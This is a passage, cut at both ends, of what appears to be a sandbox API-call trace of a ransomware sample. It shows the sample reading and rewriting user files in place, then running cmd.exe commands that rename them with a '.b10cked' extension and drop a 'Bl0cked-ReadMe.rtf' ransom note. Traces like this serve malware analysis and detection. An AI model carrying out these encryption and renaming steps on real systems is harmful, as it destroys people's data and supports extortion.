lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0145.829] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.829] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.829] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.831] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.831] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.831] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.831] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.831] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x11979 [0145.831] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0145.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0145.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0145.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x11e61 [0145.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0145.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0145.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0145.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x11e61 [0145.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0145.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0145.833] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8f2f, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8f2f, lpOverlapped=0x0) returned 1 [0145.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0145.834] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x8f2f, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x8f2f, lpOverlapped=0x0) returned 1 [0145.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=-36655, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8f32 [0145.834] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8f2f, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8f2f, lpOverlapped=0x0) returned 1 [0145.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=-36655, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8f32 [0145.834] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x8f2f, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x8f2f, lpOverlapped=0x0) returned 1 [0145.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wo_IX7FkjtTmLgs.jpg", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0145.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wo_IX7FkjtTmLgs.jpg", cchWideChar=19, lpMultiByteStr=0x13288fc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wo_IX7FkjtTmLgs.jpg", lpUsedDefaultChar=0x0) returned 19 [0145.838] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x11e61 [0145.838] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0145.838] CloseHandle (hObject=0x114) returned 1 [0145.839] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG") returned 0x26 [0145.840] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0145.840] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xaf4, dwThreadId=0xa74)) returned 1 [0145.841] CloseHandle (hObject=0x110) returned 1 [0145.841] CloseHandle (hObject=0x114) returned 1 [0145.841] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0145.841] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\") returned 0x27 [0145.841] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\", cchCount2=39) returned 1 [0145.841] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0145.841] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0145.841] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0145.841] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0145.842] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0145.842] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0145.842] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0145.842] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0145.842] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0145.842] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xb18, dwThreadId=0xa9c)) returned 1 [0145.843] CloseHandle (hObject=0x110) returned 1 [0145.843] CloseHandle (hObject=0x114) returned 1 [0145.843] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\bl0cked-readme.rtf")) returned 0x20 [0145.843] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0145.843] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0145.844] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0145.844] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.844] ReleaseMutex (hMutex=0xf8) returned 1 [0145.844] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.844] ReleaseMutex (hMutex=0xf8) returned 1 [0145.844] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.844] ReleaseMutex (hMutex=0xf8) returned 1 [0145.844] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.844] ReleaseMutex (hMutex=0xf8) returned 1 [0145.844] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.844] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20263342853) returned 1 [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1df [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0145.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1df [0145.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0145.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0145.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0145.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1df [0145.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0145.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0145.846] ReadFile (in: hFile=0x114, lpBuffer=0x1273a88, nNumberOfBytesToRead=0xee, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0xee, lpOverlapped=0x0) returned 1 [0145.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0145.847] WriteFile (in: hFile=0x114, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0xee, lpOverlapped=0x0) returned 1 [0145.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=-238, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xf1 [0145.847] ReadFile (in: hFile=0x114, lpBuffer=0x1273a88, nNumberOfBytesToRead=0xee, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0xee, lpOverlapped=0x0) returned 1 [0145.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=-238, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xf1 [0145.847] WriteFile (in: hFile=0x114, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0xee, lpOverlapped=0x0) returned 1 [0145.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="directories.acrodata", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0145.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="directories.acrodata", cchWideChar=20, lpMultiByteStr=0x13286f4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="directories.acrodata", lpUsedDefaultChar=0x0) returned 20 [0145.851] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1df [0145.851] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0145.851] CloseHandle (hObject=0x114) returned 1 [0145.852] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR") returned 0x43 [0145.852] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\") returned 0x37 [0145.853] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR\" \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, 